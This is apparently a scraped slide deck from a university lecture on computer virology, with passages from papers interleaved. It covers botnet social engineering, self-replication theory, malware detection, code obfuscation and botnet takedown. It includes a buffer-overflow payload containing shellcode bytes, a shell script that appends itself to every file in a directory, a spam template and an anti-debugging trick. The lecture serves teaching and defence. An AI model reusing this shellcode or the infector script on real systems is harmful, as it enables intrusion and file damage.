Post on 19-Aug-2018
An introduction to Computer Virology
Jean-Yves Marion, LORIA, Université de Nancy
Jean-Yves.Marion@loria.fr
Tuesday 20 December 2011
What is malware?
• Malware is a program with malicious intent
• Malware can be a virus, a worm, spyware, a botnet ...
• Giving a mathematical definition is difficult
✴ So how does it work?
How do malware infections work?
Social engineering
Vulnerabilities
Infections
Infections
Mutations
You can’t patch stupidity
Bugs are unavoidable
Social engineering
INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,
AND FAST-FLUXING NETWORKS
SOCIAL ENGINEERING TECHNIQUES SEEN
WALEDAC recently used the Christmas 2008 holidays for its social engineering ploy when we first spotted it. It has changed its social engineering tactic of spamming on holidays and in relation to current economic events seven times. Appendix A chronicles the social engineering techniques we have seen this botnet use throughout its lifetime.
In addition to tricking users to run malware on their computers, WALEDAC also consistently populates inboxes with pharmaceutical (pharma) spam—spam that advertise Viagra, Cialis, and other similar sexual-enhancement drugs. However, there are times when WALEDAC spews out spam that are neither pharmaceutical in nature nor carry other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam are also documented in detail in Appendix B.
The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far.
Figure 2. Timeline of WALEDAC activities
APPENDIX A
WALEDAC Social Engineering Tactics
At the time this report was written, WALEDAC was seen to have used eight social engineering attacks in an effort to make would-be victims run the malware. WALEDAC started out with the Christmas Ecard ploy.
Figure 1. Christmas ecard spam
Figure 2. Christmas ecard website
With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The email campaign then carried the bad news that “Obama refused to be the next president.”
Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president
Figure 6. WALEDAC rips text off from Obama’s website,
bearing false news that he no longer wants to be the president
After taking advantage of Obama’s presidential campaign, WALEDAC then turned its sights to Valentine’s Day.
Waledac
• Use of a dropper
• Conficker or other malware is used to install Waledac
• Binaries are packed with UPX and homemade packers
• Encryption technologies: RSA & AES (OpenSSL)
• Sends emails from templates
• Scans files to find email addresses and passwords
• Downloads binaries and updates itself
An email template
Received: from %^C0%^P%^R3-6^%:qwertyuiopasdfghjklzxcvbnm^%^%([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%])
by %^A^% with Microsoft SMTPSVC(%^Fsvcver^%); %^D^%
From: "%^Fmynames^% %^Fsurnames^%" <%^Fnames^%@%^V1^%>
User-Agent: Thunderbird %^Ftrunver^%
To: %^0^%
Subject: %^Fjuly^%
http://%^P%^R26^%:qwertyuiopasdfghjklzxcvbnmeuioa^%.%^Fjuly_link^%/^%
3-tier movie of an attack
social engineering
targeted attack
client-side exploit
Install malware
a dropper
Software Bugs (client side exploit)
• Data are programs
• Bugs are doors if they are exploitable (0-days)
• A bug-free system is safe
• But systems contain bugs ... and no general procedure can certify that a program is bug-free, a consequence of the undecidability of the halting problem (Turing)
Vulnerabilities : a buffer-overflow
void vulnerable(char *user_data) {
    char buffer[4];
    strcpy(buffer, user_data);  /* no bounds check */
}
buffer
EIP
EBP
...
...
...
Stack
vulenrable(«AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)
\x90\x90
\xE000
\x90\x90
\x90\x90
\xFFF0
After the overflow, the saved return address has been overwritten, so the function returns to address FFF0.
Bugs
• A buffer overflow turns a program into a self-modifying program
Wave 1 → Wave 2
Wave 2 is the code created by the buffer overflow in wave 1
What is malware?
• Infect systems by self-replication
• Mutation
• Protect itself
• Obfuscation
• Self-modification
• Detection
• Undecidable
Why trace? (1/3)
Definition: binary analysis is
• program analysis
• where the program is unknown
⟹ all we have is a binary blob
Reasons:
• indirect jumps ⟹ undecidable control flow
• indirect reads/writes ⟹ undecidable data flow
• self-modifying code ⟹ undecidable syntax
Outline
• Foundation 1 : Self-replication
• Foundation 2 : Self-modification
• Detection
• Detection by string matching
• Behavioral detection
• Botnet neutralization
Self-replicating Cellular automaton
Von Neumann (1952), Burks
Codd, Langton
Cohen's formalization (1985)
Cohen’s Virus (1985)
• Consider a Turing machine M and a viral set V
• When a TM M reads v ∈ V, M produces v′ ∈ V
• (M, V) is a description of a virus
v1 v2 ... vn   v′1 v′2 ... v′m
Self-Replication
• A virus has self-replicating capacity
• Reflexive property of programming languages, based on a pointer mechanism to the program code, e.g. $0
# for each file FName in the current path
for FName in *; do
  # if FName is not me
  if [ $FName != $0 ]; then
    # add myself at the end of FName
    cat $0 >> $FName
  fi
done
Figure 2: An example of ecto-symbiote
We see that by iterating this virus, it will make copies of itself until the
system runs out of memory.
The word “organism” comes from the terminology of Adleman in [1].
There, he proposed to study such viruses, which were not captured by his
formalization, as we shall see shortly. Organisms were a concern of Adleman.
Let us cite him [1], “It may be appropriate to study ‘computer organisms’ and treat ‘computer viruses’ as a special case”. Our formalism allows a uniform
study of both concepts.
4.5 Companion viruses
A companion virus is an entity which does not modify the functional behavior of the target program at first glance. When one executes the target
program, the companion virus runs first, and then calls the target program.
An example of a companion virus is presented in Figure 3.
A companion virus satisfies an equation of the form
$\varphi_v(p) = v'$ where $\forall x \in D,\ \varphi_{v'}(x) = \varphi_p(\varphi_v(x))$
Again, Theorem 3 gives solutions to this construction. Indeed, let q be a
program for the (composition) function $comp(a, b, x) = \varphi_a(\varphi_b(x))$. Solutions
of the above equation are the ones of the following equation.
$\varphi_v(p) = S(q, p, v)$
Indeed, $\varphi_{S(q,p,v)}(x) = \varphi_p(\varphi_v(x))$.
4.6 Implicit virus Theorem
We establish a virus construction which performs several actions depending
on some conditions on its arguments. This construction of trigger viruses is
Self-Replication
• Program encoding (Ken Thompson, «Reflections on Trusting Trust», CACM 1984)
• See also quines
main() { char *s = "main() { char *s = %c%s%c; printf(s, 34, s, 34); }"; printf(s, 34, s, 34); }
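The same program-encoding trick carries over to other languages. As a minimal sketch, assuming Python 3, the two-line quine below keeps a template string that is used both as data and as the text of the program. The names `QUINE_TEMPLATE`, `QUINE_SOURCE` and `run_and_capture` are illustrative and do not come from the slides.

```python
import contextlib
import io

# Template of the program: %r is replaced by the quoted template itself,
# and %% collapses to a single % when the template is formatted.
QUINE_TEMPLATE = 's = %r\nprint(s %% s)'

# Full source text of the quine (two lines, no trailing newline).
QUINE_SOURCE = QUINE_TEMPLATE % QUINE_TEMPLATE


def run_and_capture(source: str) -> str:
    """Execute a source string and return everything it prints."""
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        exec(source, {})
    return buffer.getvalue()
```

Running `run_and_capture(QUINE_SOURCE)` returns the source text followed by the newline that `print` appends, so the program reproduces itself without reading its own file.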
Self-Replication
• Fixed point combinators (functional programming languages)
• Computability: Kleene's recursion theorem (1938)
• See the book by N. D. Jones for a programming point of view
• See the books by Rogers or P. Odifreddi for a computability point of view
• See the marvelous books by R. Smullyan ...
Y F = F (Y F)
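A fixed point combinator Y satisfies Y F = F (Y F). In a strict language such as Python the usual Y combinator loops forever, so the sketch below uses the Z combinator, its eta-expanded variant. The names `Z`, `fact_step` and `factorial` are illustrative assumptions, not part of the slides.

```python
# Z combinator: strict-evaluation variant of Y.
# For any F, Z(F) behaves like F(Z(F)) on every argument.
Z = lambda f: (lambda x: f(lambda v: x(x)(v)))(lambda x: f(lambda v: x(x)(v)))


def fact_step(self_ref):
    """One unfolding of factorial; self_ref stands for the recursive call."""
    return lambda n: 1 if n == 0 else n * self_ref(n - 1)


# factorial is obtained as a fixed point of fact_step, with no explicit recursion.
factorial = Z(fact_step)
```

Here `factorial(5)` and `fact_step(factorial)(5)` give the same value, which is the fixed point property applied to an argument.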
A compilation point of view
• An email attachment is opened through social engineering
• X scans for information
• X extracts a list of email addresses of targeted people
• X sends a copy of itself by email
A worm X scenario
WormX(v, out) {
  info := extract(out);
  send(«badguy», info);
  @bk := findAddress(out);
  send(@bk, v);
}
Worm X specification
How to compile Worm X?
send information
find email address
send worm X to @bk
extract information
Program Semantics
Semantics
$\llbracket \_ \rrbracket : \text{Programs} \times D^* \to D^*$
where a value of $D^*$ is a system environment.
From the above example
$\llbracket send \rrbracket(\text{spider@man.com}, \text{"Hello"}, Out) = cons(cons(\text{spider@man.com}, \text{"Hello"}), Out)$
where Out is an output stream.
$\llbracket P \rrbracket(d)$ is the value of P on the environment d
Solve a fixed point equation
I Always Love You
Suppose that out is a system entry point. A specification of ILoveYou is:
love(v, out) {
  info := find(out);  // find information
  out := send(cons("badguy@dom.com", nil), info);
  @bk := extract(out);  // extract addresses
  out := send(@bk, v);  // send virus to @bk
  return out;
}
v should behave as ILoveYou if:
$\llbracket W \rrbracket(out) = \llbracket WormX \rrbracket(W, out)$
We have to solve a fixed point equation:
W is a worm satisfying the specification WormX
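Kleene's recursion theorem
A general solution to fixed point equations is given by
Theorem (Kleene, 1938). If p is a program, then there is a program e such that
$\llbracket e \rrbracket(x) = \llbracket p \rrbracket(e, x)$
A solution of the ILoveYou equation
$\llbracket v \rrbracket(out) = \llbracket love \rrbracket(v, out)$
Set v = e where p = love.
Proof:
Let d be a program such that $\llbracket d(x) \rrbracket(y) = \llbracket x \rrbracket(x, y)$, where d(x) denotes the program $\llbracket d \rrbracket(x)$.
Let q be a program such that $\llbracket q \rrbracket(y, x) = \llbracket p \rrbracket(\llbracket d \rrbracket(y), x)$.
Set e = d(q). Then
$\llbracket d(q) \rrbracket(x) = \llbracket q \rrbracket(q, x) = \llbracket p \rrbracket(\llbracket d \rrbracket(q), x) = \llbracket p \rrbracket(e, x)$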
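The proof is constructive, and its two steps can be replayed on a toy model. The sketch below is an illustration under stated assumptions, not the construction used in the talk: programs are Python source strings that define a function `main`, the semantics is given by a hypothetical helper `run`, and the demo program `P_DEMO` is harmless (it only reports the length of the program text it receives).

```python
def run(prog: str, *args):
    """Toy semantics [[prog]](args): execute the source, then call its main."""
    env = {"run": run, "d": d}
    exec(prog, env)
    return env["main"](*args)


def d(x: str) -> str:
    """Diagonal construction: source of a program with [[d(x)]](y) = [[x]](x, y)."""
    return f"X = {x!r}\ndef main(y):\n    return run(X, X, y)\n"


def fixed_point(p: str) -> str:
    """Return e such that [[e]](x) = [[p]](e, x), following the proof."""
    # q satisfies [[q]](y, x) = [[p]](d(y), x)
    q = f"P = {p!r}\ndef main(y, x):\n    return run(P, d(y), x)\n"
    return d(q)


# Harmless demo program: receives a program text e and an input x.
P_DEMO = "def main(e, x):\n    return (len(e), x)\n"
E_DEMO = fixed_point(P_DEMO)
```

With these definitions, `run(E_DEMO, 7)` and `run(P_DEMO, E_DEMO, 7)` agree: the program `E_DEMO` behaves as `P_DEMO` applied to the text of `E_DEMO` itself.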
Malware construction from a specification
The Kleene fixed point is a solution of the equation $\llbracket W \rrbracket(out) = \llbracket WormX \rrbracket(W, out)$.
Kleene's recursion theorem: if p is a program, then there is a program e such that $\llbracket e \rrbracket(x) = \llbracket p \rrbracket(e, x)$.
We can construct a virus which satisfies a given specification.
Self-replicating malware compiler
There is a compiler Comp such that W is the worm satisfying the specification Worm:
$\llbracket Comp \rrbracket(Worm) = W$
$\llbracket W \rrbracket(out) = \llbracket Worm \rrbracket(W, out)$
Self-replication with mutations
We can automatically generate malware which satisfies the specification Worm and mutates at each execution:
$\llbracket e \rrbracket(out) = \llbracket Worm \rrbracket(Mutate(e), out)$
where Mutate is a code mutation procedure.
The construction of e is given by Kleene's theorem.
Some historical facts
• 1983: the first official virus on Vax-PDP 11
• 1988: the first worm, which infects 6000 machines
• 1990: Dark Avenger mutation engine (Bulgaria)
• 1995: macro virus
• 2000: worm “I Love You”
• 2001: Palm Pilot virus
• 2004: cell phone viruses
Self-replicating compiler with mutations:
There is a compiler Comp such that for every worm specification Worm and mutation procedure Mutate:
$\llbracket Comp \rrbracket(Worm) = W$
$\llbracket W \rrbracket(out) = \llbracket Worm \rrbracket(Mutate(W), out)$
References
• PhD thesis of F. Cohen
• L. Adleman (1988), who coined the word «virus»
• Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006)
A Virus is a Virus, Lwoff
Data is code
Today’s computers are built from two key principles:
1) Instructions are represented as numbers
2) Programs can be stored in memory to be read or written just as numbers
(Patterson & Hennessy)
Applications of self-modifying programs
• Malware mutations
• Code protection (digital rights)
• Compression and packers
• Just in Time compilers
A simple self-modification
n
n + 1
A simple decryption loop
Wave 2
Wave 1
jnz @b
{@a,@b,@c,@d}
{@offset}
Another example of self-modification
Proxy = { X := Read(); eval(X); }
An external input is run
An interpreter of a known or unknown language is used to execute some data
Analyzing self-modifying programs
• Complex to design and to analyze
• Program flow may change
• In the usual semantics, program and data are separated: the semantics of a program P is defined by structural induction on P
Dynamic analysis of self-modifying programs
• Instrument a program
• Monitor memory reads (R), memory writes (W) and memory execution (X)
• We follow nested self-modifications
• We detect some code protection
• We detect code patterns
• code decryption
• Integrity checking
• ....
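The idea of following code waves from monitored memory accesses can be sketched on a recorded trace. The snippet below is a simplified model and not the algorithm of the tool used in the talk: it assumes a trace of `(operation, address)` events and the convention that a new wave starts whenever the program executes an address written since the current wave began. The names `Event` and `count_waves` are illustrative.

```python
from typing import Iterable, Set, Tuple

Event = Tuple[str, int]  # ("R" | "W" | "X", memory address)


def count_waves(trace: Iterable[Event]) -> int:
    """Count code waves in a trace of read/write/execute events."""
    written: Set[int] = set()  # addresses written during the current wave
    waves = 1                  # the original code is wave 1
    for operation, address in trace:
        if operation == "W":
            written.add(address)
        elif operation == "X" and address in written:
            # Executing freshly written memory: a new wave begins.
            waves += 1
            written.clear()
    return waves
```

For example, a trace that writes to addresses 100 and 101, executes them, then writes to address 200 and executes it is reported as three waves.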
Experiments with TraceSurfer
• Number of code waves detected over the whole set of binaries: max = 56 waves
95 613 binaries, 80% success, 1400 binaries/h
TraceSurfer is based on Pin (Intel)
Related works
• TraceSurfer, based on Pin (Intel)
• BitBlaze (Berkeley): TEMU, VINE, ...
• DynamoRIO, Ether, Metasm
• Data tainting related methods
Malware detection by string scanning
• A signature is a regular expression denoting a sequence of bytes
Worm.Y: Your mac is now under our control !
Worm.Y: Your PC is now under our control !
• Signature: «Your * is now under our control»
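A signature of this kind maps directly onto a regular expression over bytes. The sketch below uses Python's standard `re` module; the dictionary `SIGNATURES`, the function `scan` and the bound of 32 bytes on the wildcard are assumptions made for the example, not values from the slides.

```python
import re
from typing import List

# Hypothetical signature database: name -> compiled byte pattern.
# The wildcard "*" of the slide is rendered as a short, non-greedy run of bytes.
SIGNATURES = {
    "Worm.Y": re.compile(rb"Your .{1,32}? is now under our control"),
}


def scan(data: bytes) -> List[str]:
    """Return the names of all signatures found anywhere in data."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(data)]
```

Both variants of the message are matched by the same signature, while data that does not contain the string is reported clean.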
Malware detection by string scanning
• A signature is a regular expression denoting a sequence of bytes
• Database of known signatures
Source: Filiol, «Virus informatiques», Editions T.I., H 5 440v2, p. 9
- in dynamic mode: the antivirus is resident and permanently monitors the activity of the operating system, of the network and, above all, of the user. It takes control before any action and tries to determine whether a viral risk is attached to that action. This mode is resource-hungry and requires relatively powerful machines so as not to become a hindrance and push the user (a case met too often) to disable it in favour of the previous mode.

Modern antivirus products, at least the most effective ones, are supposed to combine several techniques (implemented in modules called engines) in order to reduce the risk to a minimum. These techniques fall into two groups:

• form analysis, commonly called signature search. The latter name is in fact improper, because it covers only a very restricted approach to form analysis, which groups together many techniques. Form analysis consists in analysing a code viewed as a sequence of bits or bytes, outside any execution context. This analysis is based on the notion of detection scheme ([9] chapter 2), composed of a detection pattern (relative to a malicious code) and a detection function. One then searches in various ways (characterised by the detection function), relative to one or more databases (sets of detection schemes), for strings of bits or bytes, of more or less complex structure, listed in these databases as characteristic of a given malicious code;

• behavioural analysis, in which an executable file is analysed in its execution context. This is functional detection: it is the "behaviours" or actions of the code that are studied. In this context, detection is based on the notion of detection strategy [9].

As this definition shows, the notion of detection strategy is in fact broader than that of detection scheme.

2.2.1 Antiviral techniques based on form analysis
Essentially four main techniques can be cited.

2.2.1.1 Signature search or scanning
In the most trivial (and most frequent) case, this consists in searching for a sequence of bits characteristic of a given virus, analogous to a fingerprint for the police. In the general case, the notion of detection scheme applies. Unfortunately, a study of the main current antivirus products ([9] chapter 2) shows that the detection patterns and detection functions in use are the most trivial, and therefore the weakest, that one can imagine. The reason is that any other technical choice is likely to result in an intolerable consumption of the user's resources, and therefore not to be commercially viable.

In theory, the detection pattern must not incriminate another virus, while having a size and characteristics relevant enough not to cause false alarms (the probability of finding a given sequence of n bits is inversely proportional to 2^n) ([9] chapter 2). This signature can be a more or less complex sequence of instructions, established by the code analyst according to various criteria, a message displayed by the virus, or simply the signature that the virus itself uses to avoid infecting an executable twice. The problem with signature search is that it is easy to bypass (modifying a single byte is enough). It cannot handle polymorphic or encrypted viruses effectively (unless detection functions less trivial than the AND function are considered), and still less unknown viruses. The false alarm rate is theoretically low if the signature is not too limited in size.

The main problem with this mode of detection is the need to maintain the database of viral signatures, with the constraints this entails: size of the database, secure storage (the sites of antivirus vendors holding the signature databases of their products are sometimes attacked), secure distribution, and more or less regular and effective updating by the user, who is often negligent. Currently, an antivirus is updated from several times a week to several times a day. Note that updating these databases allows the detection of new viruses or worms, but also, in some cases, improves the detection of
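Definition 5: detection strategy
A detection strategy relative to a given malicious code $\mathcal{M}$ is the triple
$\mathcal{DS}_{\mathcal{M}} = \{\mathcal{S}_{\mathcal{M}}, \mathcal{B}_{\mathcal{M}}, f_{\mathcal{M}}\}$
with $\mathcal{S}_{\mathcal{M}}$ a set of bytes, $\mathcal{B}_{\mathcal{M}}$ a set of program functions, and
$f_{\mathcal{M}} : \mathbb{F}_2^{|\mathcal{S}_{\mathcal{M}}|} \times \mathbb{F}_2^{|\mathcal{B}_{\mathcal{M}}|} \to \mathbb{F}_2$ a Boolean function called the detection function.
(A detection scheme is the pair $\mathcal{SD}_{\mathcal{M}} = \{\mathcal{S}_{\mathcal{M}}, f_{\mathcal{M}}\}$.)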
Table 1: Viral pattern of I-Worm.Bagle.P
Product | Signature size (bytes) | Signature (indices)
Avast | 8 | 12,916 → 12,919; 12,937 → 12,940
AVG | 14,575 | 533 → 536 - 538 - ...
Bit Defender | 8,330 | 0 - 1 - 60 - 128 - 129 - 134 - ...
Dr Web | 6,169 | 0 - 1 - 60 - 128 - 129 - 134 - ...
eTrust/Vet | 1,284 | 0 - 1 - 60 - 128 - 129 - 134 - ...
eTrust/Inoculate IT | 1,284 | 0 - 1 - 60 - 128 - 129 - 134 - ...
F-Secure 2005 | 59 | 0 - 1 - 60 - 128 - 129 - 546 - ...
G-Data | 54 | 0 - 1 - 60 - 128 - 129 - 546 - ...
KAV Pro | 59 | Identical to that of F-Secure 2005
McAfee 2006 | 12,127 8 | 0 - 1 - 60 - 128 - 129 - 134 - ...
NOD 32 | 21,849 | 0 - 1 - 60 - 128 - 129 - 132 - 133 - ...
Norton 2005 | 6 | 0 - 1 - 60 - 128 - 129 - 134
Panda Tit. 2006 | 7,579 | 0 - 1 - 60 - 134 - 148 - 182 - 209...
Sophos | 8,436 | 0 - 1 - 60 - 128 - 129 - 134 - 148...
Trend Office Scan | 88 | 0 - 1 - 60 - 128 - 129 - ...
Example: consider the detection of a recent and well-known worm such as Bagle.P. The list of the different detection patterns is given in Table 1. The detection function is the logical AND function. This means that, for the worm to be detected, the bytes located at the indices given in the table must have a particular value. If a single one of these bytes is modified, the worm is no longer detected.
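The AND detection function described in this example can be written in a few lines. The sketch below is an illustration only: the pattern `DEMO_PATTERN` uses made-up indices and byte values, not the real Bagle.P signatures, and the names `and_detect` and `DEMO_SAMPLE` are assumptions.

```python
from typing import Dict


def and_detect(data: bytes, pattern: Dict[int, int]) -> bool:
    """Logical AND detection: every indexed byte must have the expected value."""
    return all(
        index < len(data) and data[index] == expected
        for index, expected in pattern.items()
    )


# Hypothetical detection pattern: index -> expected byte value.
DEMO_PATTERN = {0: 0x4D, 1: 0x5A, 60: 0x80}

# A 64-byte sample whose bytes at the pattern indices match.
_sample = bytearray(64)
_sample[0], _sample[1], _sample[60] = 0x4D, 0x5A, 0x80
DEMO_SAMPLE = bytes(_sample)
```

Changing any single byte at one of the pattern indices makes `and_detect` return `False`, which is the weakness pointed out in the text.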
Worm.Bagle.P:
Malware detection by string scanning
Pros:
• Accuracy: low rate of false positives
➡ programs which are not malware are not detected
• Efficient: fast string matching algorithms
➡ Karp & Rabin, Knuth, Morris & Pratt, Boyer & Moore
Cons:
• Signatures are constructed quasi-manually
• Vulnerable to malware protections
➡ Mutations
➡ Code obfuscations
Detection by integrity check
• Identify a file using a hash function
• Cons:
  • File systems are updated, so numerical fingerprints change
  • Difficult to maintain in practice
  • A file may change while keeping the same numerical fingerprint (hash collisions)
Files a, b → hash function → hash numbers (numerical fingerprints)
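An integrity check of this kind can be sketched with the standard `hashlib` module. The choice of SHA-256 and the names `fingerprint`, `build_baseline` and `modified_files` are assumptions made for the example; file contents are passed as in-memory bytes to keep the sketch self-contained.

```python
import hashlib
from typing import Dict, List


def fingerprint(content: bytes) -> str:
    """Numerical fingerprint of a file content (SHA-256, hex encoded)."""
    return hashlib.sha256(content).hexdigest()


def build_baseline(files: Dict[str, bytes]) -> Dict[str, str]:
    """Record the fingerprint of every known file."""
    return {name: fingerprint(content) for name, content in files.items()}


def modified_files(baseline: Dict[str, str], files: Dict[str, bytes]) -> List[str]:
    """Names of files that are new or whose fingerprint differs from the baseline."""
    return sorted(
        name for name, content in files.items()
        if baseline.get(name) != fingerprint(content)
    )
```

Any legitimate update also changes the fingerprint, so the baseline has to be rebuilt after each update, which is the maintenance cost listed above.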
Behavioral analysis
• Monitor program interactions (sys calls, network calls, ...)
• Detection of program behavior from execution traces
• Functionalities are expressed at high level
Trace automata
• Trace language of a program: generally undecidable.
• Approximation by a regular language: using trace collection or static analysis.
⟹ A trace automaton is a finite state approximation of some trace language.
Figure: trace automaton whose transitions are labelled GetLogicalDriveStrings, IcmpSendEcho, GetDriveType, FindFirstFile and FindNextFile
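A behavior pattern can be checked against an execution trace with a small finite automaton. The automaton below is an assumed example built from the call names on the slide, not the automaton of the figure: it accepts traces in which a file enumeration is followed by a network send. The names `TRANSITIONS`, `ACCEPTING` and `matches` are illustrative.

```python
from typing import Dict, Iterable, Set, Tuple

# Hypothetical behavior pattern: enumerate files, then send data on the network.
TRANSITIONS: Dict[Tuple[str, str], str] = {
    ("start", "FindFirstFile"): "scanning",
    ("scanning", "FindNextFile"): "scanning",
    ("scanning", "IcmpSendEcho"): "leak",
}
ACCEPTING: Set[str] = {"leak"}


def matches(trace: Iterable[str]) -> bool:
    """Return True if the trace of call names reaches an accepting state."""
    state = "start"
    for call in trace:
        # Calls without a transition from the current state are ignored.
        state = TRANSITIONS.get((state, call), state)
        if state in ACCEPTING:
            return True
    return False
```

Ignoring unrelated calls is a design choice of this sketch: it abstracts the trace so that interleaved system calls do not hide the pattern.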
• Information leaks can be detected
• Cons:
  • Today behavioral analysis is dynamic, which implies monitoring all processes or running programs in sandboxes.
  • It slows down the system
Code protection
1. Obfuscation
2. Cryptography
3. Self-modification
4. Anti-analysis tricks
Detection is hard because malware is protected
Protections: Self-Modification and Obfuscation
• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.
• The obfuscation mechanism is automatically modified for each new distributed binary.
Figure (source: Tripoux, «Reverse-engineering of malware packers for dummies», DeepSec 2010): original binary, unpacking code, EP, OEP
• For a human analyst, obfuscated code is very hard to understand
Win32.Swizzor Packer
Problem 2: Amount of Information
(source: Tripoux, «Reverse-engineering of malware packers for dummies», DeepSec 2010)
Protections: Self-Modification and Obfuscation
• For a human analyst, obfuscated code is very hard to understand, because not all lines of code are meaningful and because x86 semantics is very tricky.
• One problem is the absence of high-level abstractions to structure and understand obfuscated code.
Code protection
1. Obfuscation
2. Cryptography
3. Self-modification
4. Anti-analysis tricks
Detection is hard because malware is protected.
Some interesting protection methods:
Obfuscation
• Function calls
✦ A function has a purpose
✦ Divide and conquer approach by understanding function purposes
Problem 3: Absence of Easily Seen, High-Level Abstractions (source: Tripoux, «Reverse-engineering of malware packers for dummies», DeepSec 2010)
We like to [...] and [...] complicated problems. In a standard binary:
This is a function. We can thus consider the code ...
• Higher degree of abstraction
• There are many, many other obfuscation methods ...
Obfuscation
• But in the malware world, what is the purpose of a function call?
Problem 3: Absence of Easily Seen, High-Level Abstractions (source: Tripoux, «Reverse-engineering of malware packers for dummies», DeepSec 2010)
But in our world, we can have:
Code protection
1. Obfuscation
2. Cryptography
3. Self-modification
4. Anti-analysis tricks
http://quequero.org/AgoBot_Botnet_Reverse_Engineering
Anti-debugging tricks
MOV EAX,-1
INT 2E
CMP WORD PTR DS:[EDX-2],2ECD
• Call interrupt 2E with an invalid EAX value
• Normal behavior: EDX contains the address of the next instruction
• Test whether EDX-2 points to the opcode of INT 2E (bytes CD 2E, read as the 16-bit word 2ECD)
• If a debugger is running, then EDX is equal to 0xFFFFFFFF
Consequences of Code protection
1. Difficult for a human analyst to understand malware code
  1. OllyDbg
  2. IDA Pro
2. Difficult to design automatic tools
  1. Static analysis
    • Abstract interpretation
  2. Dynamic analysis
A cruel world
Theorem: Let v be a virus. The set of viruses which are obtained from v by mutation is not decidable (computable).
A consequence of Rice's theorem
Theorem (Rice): Let P be a non-trivial semantic property of programs, that is, a property of the function a program computes which holds for some programs and fails for others.
Then the set of programs which satisfy P is not decidable.
Idea of the proof: construct a reduction from the halting problem.
Morphological analysis in a nutshell
Signatures are abstract flow graphs
Detection: search for a signature as a subgraph of the abstract flow graph of a program
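To make the subgraph search concrete, here is a brute-force sketch for very small graphs. It is not the detector described in the talk, which relies on more efficient techniques: nodes carry a label (for instance an instruction class), edges are ordered pairs, and the function tries every injective mapping of signature nodes onto program nodes. The name `contains_subgraph` and the labels used in the usage example are assumptions.

```python
from itertools import permutations
from typing import Dict, Hashable, Set, Tuple

Edge = Tuple[Hashable, Hashable]


def contains_subgraph(
    sig_nodes: Dict[Hashable, str],
    sig_edges: Set[Edge],
    prog_nodes: Dict[Hashable, str],
    prog_edges: Set[Edge],
) -> bool:
    """True if the labelled signature graph embeds into the program graph."""
    signature = list(sig_nodes)
    # Try every injective assignment of signature nodes to program nodes.
    for image in permutations(prog_nodes, len(signature)):
        mapping = dict(zip(signature, image))
        labels_ok = all(sig_nodes[n] == prog_nodes[mapping[n]] for n in signature)
        edges_ok = all((mapping[a], mapping[b]) in prog_edges for a, b in sig_edges)
        if labels_ok and edges_ok:
            return True
    return False
```

For instance, a two-node signature `call → jcc` is found in a program graph `mov → call → jcc`, but not if the edge between `call` and `jcc` is reversed. The cost grows factorially with graph size, so this only serves to illustrate the definition.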
Morphological detection : Results
• False negative
• No experiment on unknown malware
• Signatures with < 18 nodes are potential false negatives
• Restricted signatures of 20 nodes are efficient
• Less than 3 sec. for signatures of 500 nodes
Conclusion about morphological detection
• Benchmarks are good
• Pro
• More robust against local mutations and obfuscation
• Easily detects variants of the same malware family
• Tries to take program semantics into account
• Quasi-automatic generation of signatures
• Cons
• Difficult to determine statically the flow graph of self-modifying programs
• Requires a combination of static and dynamic analysis
Reference
• Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008.
Waledac, again ....
• How to neutralize a botnet ?
• Send the US Marshals (see the recent Rustock story)
• Design an attack
• Good understanding of the mechanisms of a botnet (reverse engineering)
• Find an attack
• Large scale experiments in vitro
Waledac Peer-to-peer communication protocol
• Each peer maintains a list of known peers (RLIST)
• Bots exchange parts of their RLIST on a regular basis to maintain connectivity
• Fallback mechanism over HTTP to fetch new peers
<lm>
  <localtime>1244053204</localtime>
  <nodes>
    <node ip="a.b.c.d" port="80" time="124053217">469abea004710c1ac0022489cef03183</node>
    <node ip="e.f.g.h" port="80" time="124053232">691775154c03424d9f12c17fdf4b640b</node>
    ...
  </nodes>
</lm>
Global timestamp
Id Repeater 1
